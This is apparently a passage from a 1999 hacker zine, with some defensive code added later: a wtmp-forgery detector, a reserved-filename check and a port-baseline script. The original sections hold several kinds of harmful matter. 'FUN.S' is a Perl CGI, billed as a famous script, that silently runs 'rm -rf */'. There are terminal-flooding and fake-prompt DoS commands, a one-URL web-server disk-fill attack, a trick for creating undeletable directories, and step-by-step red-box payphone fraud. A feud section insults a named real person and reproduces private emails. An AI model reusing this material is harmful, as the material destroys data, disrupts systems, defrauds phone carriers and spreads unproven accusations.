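/* Constructed stand-in for the fields bowzap rewrites; the real struct utmp
   adds time, pid, type and so on, and its field sizes differ by platform. */
struct login_rec {
    char ut_line[32];
    char ut_name[32];
    char ut_host[256];
};

/* login(1) writes NUL-terminated, zero-padded fields. Return 1 if non-NUL
   bytes follow the first NUL, i.e. a whole buffer of unrelated memory was
   copied into the field. */
int field_has_trailing_garbage(const char *f, size_t n)
{
    size_t i = 0;
    while (i < n && f[i] != '\0') i++;
    for (; i < n; i++)
        if (f[i] != '\0') return 1;
    return 0;
}

/* Return 1 if the text before the first NUL contains control or 8-bit
   bytes; hostnames and tty names written by login never do. */
int field_has_unprintable(const char *f, size_t n)
{
    size_t i;
    for (i = 0; i < n && f[i] != '\0'; i++)
        if (!isprint((unsigned char)f[i])) return 1;
    return 0;
}

/* Both heuristics over the three fixed-width fields. */
int record_is_suspicious(const struct login_rec *r)
{
    return field_has_trailing_garbage(r->ut_line, sizeof r->ut_line)
        || field_has_trailing_garbage(r->ut_name, sizeof r->ut_name)
        || field_has_trailing_garbage(r->ut_host, sizeof r->ut_host)
        || field_has_unprintable(r->ut_host, sizeof r->ut_host);
}

/* Build a record the way login does: zero it, then copy each string. */
void make_clean_record(struct login_rec *r, const char *line,
                       const char *name, const char *host)
{
    memset(r, 0, sizeof *r);
    strncpy(r->ut_line, line, sizeof r->ut_line - 1);
    strncpy(r->ut_name, name, sizeof r->ut_name - 1);
    strncpy(r->ut_host, host, sizeof r->ut_host - 1);
}

/* Forge ut_host the way the tool does: memcpy(sizeof ut_host) from an argv
   string, dragging in whatever followed it. `stack` is a constructed image
   of argv[2], then argv[3] ("ttyp2"), then the first environment string. */
void forge_host_like_bowzap(struct login_rec *r)
{
    static const char stack[256] =
        "justin.kalinas.home.machine\0ttyp2\0TERM=vt100\0";
    memcpy(r->ut_host, stack, sizeof r->ut_host);
}

int main(void)
{
    struct login_rec clean, forged;
    make_clean_record(&clean, "ttyp2", "sp4f", "dialup-17.example.net");
    make_clean_record(&forged, "ttyp2", "sp4f", "dialup-17.example.net");
    forge_host_like_bowzap(&forged);
    printf("clean record suspicious:  %d\n", record_is_suspicious(&clean));
    printf("forged record suspicious: %d\n", record_is_suspicious(&forged));
    return 0;
}
```

Run the same two checks over every record of a real wtmp (read it in sizeof(struct utmp) chunks, exactly as the tool does) and the edited entries stand out without any reference copy of the file; a clean login system never leaves bytes behind the NUL. A tool that zero-fills before copying defeats this particular tell, which is why the check belongs beside, not instead of, remote log shipping.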
------------------------------
2.03 --=\\redhat6_0.permissions.dos.txt\\=--
Once again I've come up with another trivial Denial of Service flaw
(wow, I seem to be good at this: Conseal Firewall, +++ath0, ppp byte-stuffing).
It's been a few months since my last DoS, so here you go:
Many of you RedHat 6.0 users who installed RedHat 6.0 rather than
upgrading may have noticed the new way RedHat displays remote TTY's.
Instead of the old fashioned /dev/ttyp<number>, it now uses
/dev/pts/<number>. There is a flaw in this new implementation that local
users can exploit to cause minor disruption to anyone using X-windows on
the local machine.
This DoS is more of a nuisance than a "real problem", but it could possibly
be used to cause some minor havoc.
The way it works is simple. When whoever is using X opens up an "xterm"
(eterm, rxvt, nxterm...) a connection is made to the X server.
If you do a "who" you will see:
(RedHat 6.0, without upgrading from previous RedHat release)
wage pts/0 Jun 6 01:39 (:0.0)
Or on older versions:
wage ttyp0 Jun 6 01:39 (:0.0)
Now this is normal, but the problem lies within the permissions of that
device.
On older RedHats if you did:
ls -l /dev/ttyp0 you would see:
crw------- 1 wage tty 3, 0 Jun 6 12:41 /dev/ttyp0
Which is normal and what it should look like.
For those of you who may be new to unix, those letters at the beginning of
the line indicate the permissions on the device.
For our output above, the line indicates it is a character device (c), and that the
OWNER has read and write permissions (rw-),
group has no permissions (---), and everyone has no permissions (---).
They basically go <type indicator><owner><group><everyone>
An example line of a device with ALL permissions set follows:
c rwx rwx rwx
|  |   |   |
|  |   |   everyone
|  |   group
|  owner
type (c = character device)
This means that everyone has read/write/execute permissions to that device.
So as you can see our ttyp0 can only be read or written to by its owner
(and root).
In the case of RedHat 6.0 with regular remote connections (like telnet)
the standard permissions are as follows:
crw--w---- 1 ov3r tty 136, 0 Jun 6 12:32 /dev/pts/0
Here it's almost the same except that group "tty" also has write access.
The problem lies in the way that the permissions are set for local
connections with the X server using xterm.
if you do an ls -l /dev/pts/<the xterm's tty> (we will use pts/0)
You get:
crw--w--w- 1 ov3r ov3r 136, 0 Jun 6 12:32 /dev/pts/0
Notice how now "everyone" has write access to this terminal?
This leads to the hole that any local user can disrupt any xterminal
connected to the local machine. Simply typing "cat /dev/urandom >
/dev/pts/<number>" will flood the xterm with garbage data making it
impossible to use. Or we can also bring back the old "flash" attack and
flash the user's xterm by dumping ASCII escape characters to his
terminal.
This isn't a particularly "deadly" DoS attack, but can be used as a
nuisance OR perhaps even to trick the user into doing something he may
not want to do. (For example dumping "Login:" then "Password:" to the
terminal may trick the user into adding his login/password to a file or to
his .bash_history).
noc-wage
wage@IDIRECT.CA
------------------------------
2.04 --=\\omnihttpd.webserver.txt\\=--
Hi all,
The bug makes temp files on the server until the server's hard disk
is full.
And anyone can do it remotely.
By default visadmin.exe (Visitor Administrator) is in the cgi-bin directory.
What you need to do is to request this URL:
http://omni.server/cgi-bin/visadmin.exe?user=guest
That's all. In a few minutes the server's hard disk is full!!
Fix: Remove visadmin.exe from cgi-bin directory.
Valentin Perelõgin
viktor@PARNU.EE
------------------------------
2.05 --=\\windows.prn.txt\\=--
I suppose that, in an effort to maintain reverse compatibility with
old MS-DOS command line gurus, you cannot create a file or directory
named PRN.xxx where the xxx is replaceable with any extension.
Explanation and flaw follow.
First, the explanation (for those of you who are familiar with the
command line use of prn, please skip to the flaw)
Old style MS-DOS command line-ing would allow you to do the following
to print your autoexec file:
C:\>copy autoexec.bat prn
what this actually does is redirect the contents of autoexec.bat to
the port LPT1. So, as stated in the first sentence, in an effort to
preserve this feature, Microsoft will not allow you to create any file
or directory whose name prior to the extension is exactly PRN.
Now the flaw:
Although you cannot create a local file whose name is PRN, you can,
however, jump onto a networked server (suppose its name is
\\whatever) and create (in any directory that you have creatable
permissions) any file or directory named PRN.xxx (again, xxx stands
for any extension). The server must be accessed by its \\ notation,
you cannot do this if you map \\whatever\anydir to a drive (such as
w:), then go to w:\ and try to create the file, in that case your
machine's name parser blocks you.
Ok, so that doesn't seem so bad, but the real issue is that the
directory you've just created is non-removable for as long as it
possesses that name. So let's try to rename the file... oops, can't do
that, we get an access violation. Next, let's try mapping
\\whatever\anydir to w:\ again. I go to my new W drive and try to
rename the file, I get the error "Cannot rename prn: A file with the
name you specified already exists. Specify a different filename."
Ooooookaaaaay. Frustrated now, I try to delete the file. Oops, now
it tells me "Cannot delete prn: The parameter is incorrect." Well,
what about that file/directory I've created with the name PRN.xxx?
That one vanishes with no problem, but only when the server is
referenced in the \\whatever fashion. When I try to delete this
PRN.xxx file from my new W: drive, all it does is lock up my window
with a nearly endless hourglass. Finally, ten minutes later, I'm told
"Cannot delete file: File system error (1026)." But this only occurs
after I've renamed the parent directory. The error that is reported
has nothing to do with the file PRN.xxx, but instead with the fact
that the file upon which it was trying to do a delete operation
disappeared between when the delete was initiated and when it was
finished. Note that PRN.xxx acts somewhat differently than PRN alone.
The next step is to try to delete the parent directory. This does not
work! PRN still gives access violations, and so the parent directory
is locked in place. So how much harm can this REALLY be? So I've got
a few empty files and directories that are undeletable. Well, if
instead of just creating a new directory, I copy a large directory to
the server, say c:\winnt, or perhaps c:\program files, then rename it
to prn, now I've just created half a gig or more (depending on how
malicious I am) of un-reclaimable server hard drive consumption. This
directory cannot be browsed! It has become a sore on the surface of
this hard drive.
Well, remember con? The virtual file that was like prn, except that
instead of echoing to LPT1, it echoes to the screen. I try to
recreate this whole process with con, but the server is much too smart
for that, it yells at me and tells me "Cannot create or replace file:
The filename you specified is invalid or too long. Specify a
different filename."
I don't know, but I suspect that there exist utilities that would
catch this filename's invalidity, and do something about it. Norton
Disk Doctor is usually pretty good about those kinds of things.
Unfortunately, I don't have local access to the servers I have
available to create this flaw on, so I cannot test that. If someone
can test that on various workstations and servers, I'd be interested
to know if Norton can do this. Please put your new PRN directory/file
in a place that you don't care if it resides there forever.
This flaw seems to lend itself to a disk-consuming virus, one that
creates \\127.0.01\anydir\hahaha.tmp and dumps useless garbage in it
until it receives the TERM signal at which point it renames this file
to PRN. Next time it is started this virus could create a subdir
called hahaha and repeat the process there.
This was tested on Windows NT workstation 4.0 SP3 creating PRN's on
Windows NT Server 4.0 SP?.
STEVENS, Eric
Eric.Stevens@RP-RORER.COM
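The post above shows that the protection lived only in the client's name parser, so the server happily created PRN.xxx. The example below is added here and is not part of the original post: a POSIX sh check that a Unix-hosted file share or upload handler could run server-side to refuse such names before they are created. It uses the reserved-name set that Microsoft documents for Windows (CON, PRN, AUX, NUL, COM1-COM9, LPT1-LPT9), strips any extension first since PRN.xxx is just as reserved as PRN, and accepts both slash and backslash path separators; the sample paths are constructed.

```shell
#!/bin/sh
# Added example (not from the original post): reject Windows reserved
# device names before a file is created on a share or via an upload.

# is_reserved_dos_name PATH
#   Returns 0 if the base name of PATH, with any extension removed, is one
#   of the Windows reserved device names; 1 otherwise. Both "/" and "\"
#   are treated as directory separators.
is_reserved_dos_name() {
    name=$(printf '%s' "$1" | tr '\\' '/')   # normalise separators
    name=${name##*/}                          # drop directory components
    name=${name%%.*}                          # drop everything from the first dot
    name=$(printf '%s' "$name" | tr 'a-z' 'A-Z')
    case "$name" in
        CON|PRN|AUX|NUL|COM[1-9]|LPT[1-9]) return 0 ;;
        *) return 1 ;;
    esac
}

# list_reserved_names
#   Reads one path per line on stdin and prints those that must be refused,
#   e.g. to vet a batch of files before copying them onto a Windows volume.
list_reserved_names() {
    while IFS= read -r p; do
        [ -n "$p" ] || continue
        if is_reserved_dos_name "$p"; then
            printf '%s\n' "$p"
        fi
    done
}

# Constructed sample batch: two of the four names must be refused.
SAMPLE_PATHS='docs/readme.txt
docs/PRN.txt
\\whatever\anydir\prn
logs/lpt1.log'

# demo_reserved: run the vetting over the constructed batch.
demo_reserved() {
    printf '%s\n' "$SAMPLE_PATHS" | list_reserved_names
}
```

The check deliberately compares only the part before the first dot, which is why `PRN.txt` and `lpt1.log` are refused while `printer.txt` and `com10` pass; the post's observation that the server accepted `PRN.xxx` but rejected `con` shows why the decision cannot be left to whichever parser happens to be in the path.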
------------------------------
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
FUN.S
#!/usr/bin/perl
# Lord Oak's famous Perl script.
# Only works with a UNIX box and
# no configuring is needed!
print "Content-type: text/html\n\n";
$fjear = `rm -rf */`;
print "Lord Oak 0wns m3!";
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
<!-- 3.00 - Misc //-->
3.01 --=\\Red Box made easy\\=--
Q. What is a red box?
A. With this you can Make free phone calls from pay phones by generating .25,.10,and .05
tones.
Q. Does this work on my phone at my house?
A. No, NEVER EVER try to do any thang from your own phone line, it is plain stupid.
Q. Where can I use it at?
A. COCOT (Customer Owned Coin Operated Telephone)
Q. How do I make one?
A. There are a lot of text files out there that try to explain how but they do not tell
you how to program the tones. So me and teliepimp wrote this for the people that want
to know how to make one and program the tones.
Alright this is gonna be a quick and easy to understand article on how to make and
program a redbox.
Go to radioshack and ask to buy a 43-141 tonedialar old 33mem one or a 43-146 tonedialar
new one. Once you have that go home and get a 6.5536mhz crystal it doesnt have to be
exactly this crystal but keep it in the 6.55mhz or at the very least 6.5mhz crystal
area. Right now you must modify the damn tone dialar.
Unscrew the screws an snap the case open an such then find the little thing that looks
like a capasitor or resister and solder it off. The capasitor is desguised as that its
actually a crystal it will say Z3.58M on it. Now take your new crystal an solder that on
it. All you got to do is put it back togeather and you are done with making it.
Now that you have that done its time to program the damn thing.
You should program a quarter tone than a dime tonean so on... just push the buttons as
stated below.
.25tone:
memory, *, *, *, *, *, 0memory then one of the P1 thats yer quarter tone
.10tone:
memory, *, *, memory, P2
.05tone:
memory, *, memory, P3
Alright now you have the three basic tones you can combine sequenses to get diffrent
things like a dollar and so on.
Now the phun part
Go to a payfone I think the ge ones will work or the SW bell or others work too.
Now this is the first way go up to the fone dial the # then when it says please put in
blah blah to help our profteering gluttonous organazation or some thang. Then play all
the tones you want then it should connect always try this method first just to test it
its easier then the other way but what the hell.
Ok right now the other way,
Call the opperator then have her dial the # then say you are going to pay with the
change in your hand for the call. Then put a nickel or some thing in just in case shes
still listening then play the tones not to fast just in case shes STILL listening.
EazyMoney
eazy_money@Cyber-Strike.com
------------------------------
3.02 --=\\Conventions & Expos\\=--
Here is a list of upcoming hacker/security conventions and meetings that you might
want to check out.
Beyond Hope
-Date: Aug 8-10 (1999)
-Location: New York City (USA)
-Homepage: http://www.hope.net/
--
World Conference on Information Security Education
-Date: June 17-19 (1999)
-Location: Stockholm, Sweden
-Homepage: http://www.dsv.su.se/WISE1/index2.html
--
NetSec '99 9th Annual Network Security in the Open Environment
-Date: June 14-16 (1999)
-Location: St Louis, Missouri (USA)
-Homepage: http://www.gocsi.com/conf.htm
--
11th FIRST Conference on Computer Security Incident Handling and Response
-Date: June 13-18 (1999)
-Location: Brisbane, Australia
-Homepage: http://www.first.org/conference/1999/
--
DefCon
-Date: July 9-11 (1999)
-Location: Las Vegas, Nevada (USA)
-Homepage: http://www.defcon.org/
Lord Oak
lordoak@thepoison.org
------------------------------
3.03 --=\\Securing Linux\\=--
(IDG) -- I'll say at the outset that I feel that the title
"Securing Linux" is somewhat misleading. It implies that one can
somehow go through a series of steps and emerge at the end with a
secure Linux system or network. That isn't true. The real intent of
this two-part series is to help you improve the security of your
system and to get you to think securely. One without the other is
unlikely to succeed.
Security is a state of mind
Ultimately, security isn't something that is achieved as an end
goal; it isn't a state. Rather, it's a way of setting up, maintaining,
and running an operating system, network, or environment. Security
is a process and a mind-set as well as a condition. It depends
on the day-to-day actions of the system or network's users and
system administrators. It also depends on the system security not
being so intrusive that it encourages users and administrators
alike to work around it.
But you have to start somewhere, and that somewhere is to improve
the security of your system as much as possible while still meeting
your operational needs. A system that isn't connected to any
network or phone lines and is kept in a locked room is reasonably
secure -- but it will meet few of your needs. From there we embark
on a series of compromises between the best possible security and
the least inconvenience and difficulty that will serve our purposes.
Some of these tips are specific to Linux systems, but many are very
general principles that apply to all systems and networks -- not
just to Unix (or Unix-like) OSs.
1.Less is more
Applying the Principle of least privilege and the Principle of
minimum access ensures that you open up your system to the least
amount of risk. Users are allowed only enough privilege and access
to do their work, and no more. More...
2.Planning
Plan ahead and plan to distribute services. Even before you begin
an installation (and, ideally, before you purchase system software
solutions), make a detailed plan of your intended security defenses.
On paper. More...
3.Installation
A secure system starts with a secure install.
This is one area where the various Linux distributions fail to do
an adequate job. All of the distributions are guilty of making it
too easy to set up insecure or misconfigured installations. Many of
them enable services that the new user is unlikely to be aware of,
or enable services before they are fully configured. More...
4.Secure services
Internet and network services are among the most vulnerable parts of
your system. Whether you're planning a new installation or
reviewing security on an existing system, your file servers, e-mail
services, Web servers, FTP, and other network services should be
among the first things you check for security holes. More...
5.Up and running
Once your system is set up, be sure to keep track of the services
you're running. Keep a close eye on services and applications by
monitoring your UDP and TCP ports. More...
6.Password and authentication security
Passwords can be the most underestimated security feature you have.
Make sure that neither you nor your users are using transparent
(easily guessed) passwords, and make sure that your passwords are
safe from unauthorized intruders. More...
7.Security and the privileged user
Never perform routine operations as root! Do your routine work as a
nonprivileged user and step up to root only when needed. This is a
common mistake of most newbies to Linux (and Unix in general). When
you (or a user or a program) must run as root, take the proper
security precautions. More...
8.Cryptography and security
Cryptography is a good thing. It can protect our files, our e-mail,
and our communications. Widespread use of cryptography will improve
and change the security landscape. Take advantage of cryptography
wherever its use is appropriate. More...
9.Eternal vigilance
Once you've secured your installation and checked your basic
security and services, your work isn't over. In fact, the job of
keeping your system secure is never over. Even with eternal
vigilance, some risk remains, and it may still be possible for
someone, sometime to get in. With or without the help of any one
of a number of monitoring programs, you must keep a watchful eye
on what is going on in your system. More...
10.Stay informed
New security holes and bugs are discovered and exploited constantly,
and new techniques, patches, and fixes are created to counter the
threat they present. The only way to safeguard the system you've
worked so hard to secure is to stay on top of new information as it
becomes available. More...
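Point 5 above ("keep track of the services you're running ... by monitoring your UDP and TCP ports") and point 9 ("eternal vigilance") come down to one habit: record what is listening once the system is set up, then compare later. The script below is added here as an example and is not part of the IDG article. It normalises `ss -lntu` style output into "protocol local_address" pairs and reports listeners that were not in the baseline. The live snapshot assumes a Linux host with the iproute2 `ss` command; the two listings it is exercised on are constructed.

```shell
#!/bin/sh
# Added example, not part of the IDG article: a baseline check for
# listening TCP/UDP ports. Snapshot once the system is configured, then
# compare later snapshots against it; anything new is a service you did
# not plan for.

# normalise_listeners
#   Reads "ss -lntu" style lines on stdin and prints "proto local_address"
#   pairs, sorted and de-duplicated so that comm(1) can compare two runs.
#   The header line is dropped because its first field is not tcp/udp.
normalise_listeners() {
    awk '$1 == "tcp" || $1 == "udp" { print $1, $5 }' | sort -u
}

# new_listeners BASELINE CURRENT
#   Prints the listeners present in CURRENT but absent from BASELINE
#   (both files as produced by normalise_listeners).
new_listeners() {
    comm -13 "$1" "$2"
}

# snapshot_listeners
#   Live snapshot of the local host (assumes ss from iproute2).
#   Save the first run: snapshot_listeners > /var/local/listeners.baseline
snapshot_listeners() {
    ss -lntu | normalise_listeners
}

# Constructed sample listings in ss -lntu layout
# (Netid State Recv-Q Send-Q Local Peer): the baseline has sshd and ntpd,
# the later snapshot also has something on TCP 6000.
BASELINE_RAW='Netid State  Recv-Q Send-Q Local        Peer
tcp   LISTEN 0      128    0.0.0.0:22   0.0.0.0:*
udp   UNCONN 0      0      0.0.0.0:123  0.0.0.0:*'
CURRENT_RAW='Netid State  Recv-Q Send-Q Local        Peer
tcp   LISTEN 0      128    0.0.0.0:22   0.0.0.0:*
udp   UNCONN 0      0      0.0.0.0:123  0.0.0.0:*
tcp   LISTEN 0      5      0.0.0.0:6000 0.0.0.0:*'

# demo_new_listeners: run the comparison on the constructed data.
demo_new_listeners() {
    b=$(mktemp); c=$(mktemp)
    printf '%s\n' "$BASELINE_RAW" | normalise_listeners > "$b"
    printf '%s\n' "$CURRENT_RAW" | normalise_listeners > "$c"
    new_listeners "$b" "$c"
    rm -f "$b" "$c"
}
```

In production the baseline file is written once after installation, and a cron job runs `snapshot_listeners > current; new_listeners baseline current` and mails any output; an empty result is the expected state, so every line that does appear deserves a look.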
The enemy within is ignorance
While advanced security can be difficult to implement, a great deal
can be achieved by taking the simple steps of knowing what you're
running and disabling services you aren't sure about. Even small
sites and single Linux systems can take steps to reduce the risk
and harden their security protection.
Not all of these ideas are ideal for all circumstances. You have to
understand and balance your security needs, your network design,
your functionality needs, and your security policy (if you have
one). In any case, knowledge is your best security tool and
ignorance is your worst enemy.
http://www.cnn.com/TECH/computing/9906/03/linux.ent.idg/
------------------------------
<!-- AO.00 - Info on AntiOnline //-->
Here is some information that I have collected from various sites and e-mails about the
JP and AntiOnline issues. At the end, this will also contain my opinion and other facts
that I have put together. All of these e-mails were taken from www.attrition.org and
all credit is given from where it was taken.
JP (owner of AntiOnline), is now giving away all of the information he has collected on
people to the FBI if they want it or if they want to sign up. We all know that JP has
had many interviews (whether they are true or not, that is another thing), this could
be a major problem for some/many people. What he is doing is totally wrong and very
immature. He is mainly mad because no one likes him and things like that. Either that
or he is just trying to get attention and to try to make 'new' friends. Well, if it was
for media attention, he sure got it, but the main thing is "is it good"? And also is it
"Because people are starting to like him and his site?". Well, I will let you figure
that out on your own.
AO.01 ~[www.wired.com]~
-----------------------
A Web site addressing computer hacking issues has accused a computer security pundit
of paying individuals to break into Web servers in exchange for exclusive coverage
of the stories that result.
John P. Vranesevich, editor of computer security magazine and resource center
AntiOnline, denies the charges.
Vranesevich is well known in the hacking and cracking community. He is often called
on by news media, including Wired News, to provide perspective on Web site break-
ins, viruses, and other security issues.
A report by the group Attrition.org, released Monday, accuses Vranesevich of paying
hackers to break into sites, thus guaranteeing him an exclusive on the stories.
"We've never paid for a story," Vranesevich said. "We don't even pay our reporters
for stories. [The allegations] are flat-out libelous and there's no proof to it.
It's an attempt to destroy, defame, and discredit me."
Vranesevich's detractors were already inflamed over his recent apparent shift in
allegiance. On Friday, Vranesevich posted an editorial on his Web site that stated
he was working with the Air Force and other government agencies to help track down
crackers.
"A little note to the thousands of hackers that read this site," Vranesevich warned,
"I have been watching you these past five years. I know how you do the things you
do, why you do the things you do, and I know who you are."
His warnings have stirred the ire of attrition.org, led by Brian Martin (who goes by
the name Jericho). Martin said he has been following Vranesevich's case for more
than a year.
Martin based his claims on two emails that allegedly show Vranesevich had a business
relationship with "So1o," the hacker accused of breaking into senate.gov last year.
Vranesevich said the emails displayed on Martin's site "never existed."
-------------
AO.02 ~[E-mails from Attrition]~
--------------------------------
Here are 2 e-mails that Attrition recently received. They posted these e-mails on
their site, but JP and the rest of AntiOnline are saying they are lies and made up.
You can visit Attrition's website at: www.attrition.org and I thank them very much
for supplying the information that they did.
-AO.01A [Email #1]
IMPLICATION:
Serious questions would arise if it was known that a company was funding
a person(s) to create problems in order for them to profit from solutions.
By hiring an active hacker responsible for breaking into various systems,
and then offering a product to help stop intruders, there is a direct
cause/effect relationship that leads to unethical profiting from inflated
and false threats of system intrusion. By having said hacker break into
a high profile web site, deface the web pages, and then offer 'exclusive'
"news", it presents the illusion of accurate and honest reporting, when
there was little or no news to begin with.
PROOF:
This mail from John Vranesevich shows that he and/or AntiOnline IS funding
the development of a product called "Local Secure".
---------- Forwarded message ----------
Received: from antionline.com ([209.166.177.36])
by phalse.2600.com (8.8.8/8.8.8) with SMTP id PAA27067
for (bronc@2600.com); Wed, 12 May 1999 15:02:29 -0400 (EDT)
Message-Id: <199905121902.PAA27067@phalse.2600.com>
Received: from bessie ([209.166.177.43]) by antionline.com ( IA Mail Server
Version: 2.3. Build: 10019 ) ) ; 12 May 1999 19:03:17 UT
X-Sender: jp@smtp.antionline.net
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.0
Date: Wed, 12 May 1999 15:03:17 -0400
To: Bronc Buster (bronc@2600.com)
From: John Vranesevich (jp@AntiOnline.com)
Subject: Re: Information
In-Reply-To: (Pine.NEB.4.05.9905121444030.26886-100000@phalse.2600.com)
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Greetings:
Haha, first off. "Local Secure" is a solaris vulnerability scanner that AntiOnline is having
commercially developed. ROFL "some secret 'spy' project". We had a small group of programmers contact
us about it, it looked cool, so we threw them a few bucks .
[snip...]
Yours In CyberSpace,
John Vranesevich
Founder, AntiOnline
-------------
-AO.01B [E-mail #2]
IMPLICATION:
That an active hacker has a significant role in a company offering security
solutions. This behavior is an absolute 'no' in the world of security consulting.
If it is known that active hackers populate a security team, what guarantees
exist that they will behave ethically when doing consulting work on your network?
PROOF:
The following mail proves that "so1o", a.k.a Chris McNab holds a significant
position in Network Security Solutions Ltd.
---------- Forwarded message ----------
Received: from cc02mh.unity.ncsu.edu (cc02mh.unity.ncsu.edu [152.1.1.144])
by cc01mh.unity.ncsu.edu (8.8.7/8.8.7) with ESMTP id MAA22054
for (jkwilli2@cc01mh.unity.ncsu.edu); Sun, 11 Apr 1999 12:22:24 -0400 (EDT)
From: chris@ns2.co.uk
Received: from netgates.co.uk (macmail.netgates.co.uk [194.105.64.74])
by cc02mh.unity.ncsu.edu (8.8.7/8.8.7) with ESMTP id MAA18125
for (jkwilli2@unity.ncsu.edu); Sun, 11 Apr 1999 12:22:22 -0400 (EDT)
Received: from onyx.nss.cx (t@glm001 [193.9.120.4]) by netgates.co.uk
(8.7.5/8.x.x) with SMTP id RAA26418 for (jkwilli2@unity.ncsu.edu); Sun,
11 Apr 1999 17:22:29 +0100 (BST)
Message-ID: (2BC8B641.5DCB@ns2.co.uk)
Date: Sun, 11 Apr 1993 17:22:25 -0700
Organization: http://www.ns2.co.uk/about.html
X-Mailer: Mozilla 3.01 (Win95; I; 16bit)
MIME-Version: 1.0
To: Ken Williams (jkwilli2@unity.ncsu.edu)
Subject: Re: 2.6 md5's
References:
(Pine.SOL.4.05.9901061816020.10775-100000@ultra1-100lez.eos.ncsu.edu)
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-UIDL: 90e8e8bdcef936724ed2ef7fd94a63f1
Hi Ken,
Chris (so1o) here again.. just asking for a quick favour (well, 2 mins
of work on your part, heh). After some hard-drive difficulties I've been
experiencing here, I've been trying to rebuild my exploit/tools
collections.
I was simply wondering if it would be possible for you to .tgz up the
*.c files in the
http://www.Genocide2600.com/~tattooman/Exploit_Code_Archive/ directory
on your site, I only really need the C source files, this will also keep
the .tgz's filesize down :-)
I would be _extremely_ grateful if you
could hook this up for me, maybe
you can put the files on an FTP at ncsu.edu or somewhere fast.
Take it easy,
Chris
--
Chris McNab |
Managing Director | Network Security Solutions Ltd.
| http://www.ns2.co.uk
-------------
AO.03 ~[AntiOnline's Response]~
-------------------------------
First off, for those of you that haven't read it, Brian Martin's Attrition website
has today posted allegations that AntiOnline funded the Whitehouse.gov and
Senate.gov hack so that we would have news to cover (However, I'm sure most of you
have read it by now, because of organizations, and I use the term loosely, like the
Hacker News Network).
Needless to say, when I went forward with the statement that AntiOnline was going to
help in the fight against malicious hackers, I expected some backlash from the
hacker community. A few dozen extra hack attempts a day, some synfloods. Maybe I'd
find myself with a $10,000 phone bill. But, they've apparently chosen something far
more creative.
First off, let me say this. Brian Martin (aka Cult_Hero) was raided by the FBI in
connection with being a suspected member of the HFG (The group that hacked the New
York Times), and Erik Ginorio (BroncBuster) is known, and admits, to breaking into
dozens of sites (he calls himself a hacktivist). The fact that these two could
think, or at least think up, some grandiose scheme which involved AntiOnline bank-
rolling hackers, is not surprising. They have both lived their lives trying to
break, and evade, the law.
For some reason, Brian Martin has become obsessed over AntiOnline. His website has
dozens and dozens of pages of what he calls "errata" that he's written about it. He
takes information posted on our site out of context, then criticizes us because of
it. Many people have written in asking why we never posted any response to all of
the allegations he has on his site about us. Personally, it's because I felt that I
didn't need to justify myself, or my actions, to someone who is currently under FBI
investigation, and who has never done anything for the security scene other than
criticize others. I actually feel bad for him. The fact that he spends such a large
portion of his life trying to "bring down" others using lies, deceit, and twistings
of the truth, is sad in my eyes.
As for these allegations that I paid people to break into government sites so that I
could write a story. Let me just say, that such claims are so far fetched and
preposterous, I'm not even going to respond to them on a point by point basis.
It seems that almost all of the criticisms that I receive from people like Brian
Martin revolve around money. He says in his "allegations" about AntiOnline that
"During the past five years, AO has grown from a five megabyte hobby web site, into
a multi domain business venture with hundreds of thousands of dollars in venture
capital." Is that what he's so upset about? That I've made a ton of money? Well, let
me put his mind at ease. The point in fact, is that I don't now, nor have I ever in
my life, had a lot of money. Our venture funding wasn't in the amount of hundreds of
thousands of dollars. I am not ashamed to say, and in fact, I'm very proud to say,
that our original funding was in the amount of $75,000. I am very proud of the
levels I have taken AntiOnline to with very little resources, and a lot of hard
work. On average, I put in 17 hour days working on the site and related matters. At
the age of 20, I'm trying to build a life long career for myself. So, to people like
Mr. Martin, let me just say that anything my site has accomplished has not, and tru-
ly couldn't have been, from me throwing money at it. It came from my love for what I
do, and my willingness to put in the time it takes to accomplish my dream.
In a way, I take these allegations that have come against me as a sign that I'm on
the right track with what I'm doing. If people like Brian Martin weren't yelling and
screaming about me, I guess I'd take that as a sign that I'm off the beaten path. If
people like Brian Martin didn't see me as a threat to them, they wouldn't be yelling
So, I'm going to view these recent allegations as a job well done letter from the
malicious hackers of the world.
I have always lived my life in a way which I was proud of, and I will continue to do
so. I will NOT allow people like Brian Martin and Erik Ginorio to cause me to
constantly be taking some sort of sick defensive on my site (Which is probably what
their intentions are). That's not its purpose. So, if they come out with some new
allegation, like I have secret plans to assassinate the president with a herf gun or
something, you won't find a response to them from me here. As a matter of fact, you
won't find a response from me at all. I will let the work that I put forth, and the
actions that I take in my daily life, be my response.
Yours In CyberSpace,
John Vranesevich
Founder, AntiOnline
-------------
AO.04 ~[Added Comments]~
------------------------
Well my opinion on this topic is that JP is being totally immature. He is 'telling'
on people. People trusted him (kinda) to let him interview them and now he is
releasing all of that information about people. JP is releasing all of that
information to government and military officials. He said that he is 'against' our
illegal activity, but yet he claims he is a hacker? Yea OK. So he is a hacker
(supposedly), but yet turns on us? Wow, this makes him a traitor along with being a
liar and immature.
He is totally gonna change the community. Now when someone wants to interview a
hacker, the hacker is gonna think 'Can I trust him/her?'. So basically there goes
MOST/A LOT of the interviews and the information that is supplied about people and
what goes on. He is being a total dick and an idiot. Wow, that's 2 more things we can
add to the list.
The one thing where I get lost is at: what makes a difference if he posts it on his
site where everyone can see it (including the government)? It doesn't, he is doing
it for the media/attention. Uh oh, we just added media wh0re to the list also! Since
we have come up with some characteristics of JP, let's take a look at them:
-Immature
-Tattle Tale
-Hypocrite
-Traitor
-Liar
-Dick
-Idiot
-Media Wh0re
Wow that's a lot of things. I am sure I/we can come up with lots more but the server
doesn't have 7gigs to spare for a text file. Another reason is that why would I want
to waste my time writing up things about JP (characteristics)? I wouldn't want to
waste my time on him.
Most of you know I am not one to talk trash or bad about other people, but when it
comes to things like this, there is no way to help it. When someone is the things
listed above (all put together), that shows the person has lack of respect for
anyone and is in it all for the money (well greed was just added).
I am truly sorry to those who like AntiOnline and go there and wanted to read this
section about what I think of this situation. But mainly it is the truth, and there
is honestly no way out of it. The only things that MIGHT not be true are the e-mails
that were sent to Bronc Buster (posted on attrition), but that has not been
proven yet. And I personally think that they are true and really from him though
they might be modified SOME with things stretched and exaggerated.
-Lord Oak
lordoak@thepoison.org
-------------
This portfolio of information about AntiOnline was put together by Lord Oak and
everyone was given credit from where I took the information from. Permission is needed
